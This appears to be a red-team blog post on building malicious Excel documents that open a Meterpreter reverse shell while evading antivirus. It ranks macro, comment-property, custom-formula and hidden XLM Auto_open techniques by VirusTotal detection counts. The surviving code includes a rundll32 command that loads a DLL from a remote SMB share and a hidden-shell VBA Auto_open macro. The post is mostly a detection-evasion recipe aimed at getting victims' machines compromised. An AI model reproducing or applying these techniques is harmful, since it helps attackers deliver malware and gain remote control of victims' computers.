MS Excel Weaponization Techniques
Different methods to run a command line via Excel file in order to spawn a Meterpreter reverse shell.
Introduction
Here we are again talking about reverse shell and evasive methods for not being detected. From my last article (Undetectable C# & C++ Reverse Shells) many things have changed: some of the methods used are now monitored and detected from different AVs. So i have to find a new way to make my reverse shells hidden and undetectable. Lets see how…
…old and simple methods could be the best…
Open a Meterpreter Reverse Shell via SMB_Deliver Exploit
The Metasploit SMB delivery module serves .dll payloads via an SMB server and provides commands to retrieve and execute the generated payloads. This method is very simple and many articles have been made about it. What I didn’t know about this method is that it is a great way to evade antivirus.
Lets see how it works:
Begin by loading the related module into Metasploit and configure it:
You can choose the dll file name, folder and the path name (in this case i used 1,2,3 just for convenience). After that you can run “exploit”. Automatically the meterpreter_reverse_tcp payload will be set in order to open a Meterpreter reverse shell on a victim machine. If you want you can choose a different payload according to your needs. To make everything work, the generated command must be executed on a victim machine.
This should be the result:
On a victim machine the command line that you have to run is the following:
Then executing the command directly on the victim machine the reverse shell is opened. At this point you just have to insert this command line into a malicious document. let’s see how…
…but what is the best method for not being detected?
Let’s see what is the best technique to make an Excel file undetectable. Remember that with all the following attacks, once enabled the macros or confirmed the execution of the command line, I have opened a reverse shell without alerting Windows Defender on a Windows 10 Fully patched machine.
Excel Weaponization Techniques:
Cleartext command line inside a VBS macro script:
I tried to save the same file with .xlsm format and see the result:
And here our first result: the AV engines that were able to analyze this file are 3 more but the detection is one less. Nice let’s go deeper…
Command line in clear text in the comments section and executed using macro:
I inserted into comment section the malicious command line:
In order to execute the payload embedded within the ‘comments’ property, the following embedded Macro can be used:
Note: In order to use auto-execution via the ‘Workbook_Open()’ function, the weaponized MS Excel document needed to be downgraded to Office 98–2003 compatibility (.xls)
Here the VT results:
Nice! It seems that this technique is better known than the previous ones. Let’s see the next one…
Cleartext command line executed via custom formula:
In order to run the command line i created a custom formula which is right for us:
let’s see how it acts against the army of VT AVs:
Great! In this case if you have Kaspersky you can sleep peacefully otherwise you start to worry :)
Encoded PowerShell command line inside a VBS macro script:
naaa … as soon as you put a powershell inside a macro you are detected as malicious almost by default. Too much attention on powershell executed by a macro. Even Windows Defender has deleted my file as soon as I’ve created it.
Encoded PowerShell Command line in the comments section and executed using macro:
What if I ran the usual command line but encoded in Base64 using Powershell?
Same result of the same method with the commands in the clear. This is interesting. It means that the commands in base64 are managed in the same way as a clear command line. So at this point if you want to use this method better avoid further work in encoding commands.
Encoded PowerShell command line run via malicious formula:
I inserted the powershell that runs the command line encoded in base64 in a formula:
Here the VT Result:
It’s obvious that the powershell are overwatched. The same method as before but through a powershell has resulted in 10 more detection.
NEW Methods — UPDATE 7/4/2019:
Cleartext command line executed via Excel 4.0 Macro (also called XLM macros):
Thanks to the contribution of the community I also wanted to try the old method of macro XLM. Always using the same clear code this is the result:
Command line:
rundll32.exe \\10.0.2.15\3\2\1.dll,0
I have hidden the macro sheet and put the macro in “Auto_open” and here the VT result:
VBS macro script inside Custom Button:
With this method i inserted the VBS Macro script inside a custom button:
Macro code:
Sub Auto_open()
Call Shell(“cmd.exe /c rundll32.exe “”\\10.0.2.15\3\2\1.dll””,0"””, vbHide)
End Sub
Here the VT results for .xls file type:
Same code but with .xlsm file type:
The Winners are:
- Cleartext command line executed via custom formula: 2/59
- Cleartext command line executed via Excel 4.0 Macro (also called XLM macros): 2/59
Conclusion
Thanks to these tests, an interesting fact emerged: If you are a red teamer or a pen tester today you can think of using malicious formulas or XLM Macros. To date, the formulas and XLM Macros seem to be the least observed techniques by various antivirus. Obviously this is a test based on a simple command line that uses an old method and is certainly not exhaustive. Let me know what you think and tell me about your experiences here or on Twitter.
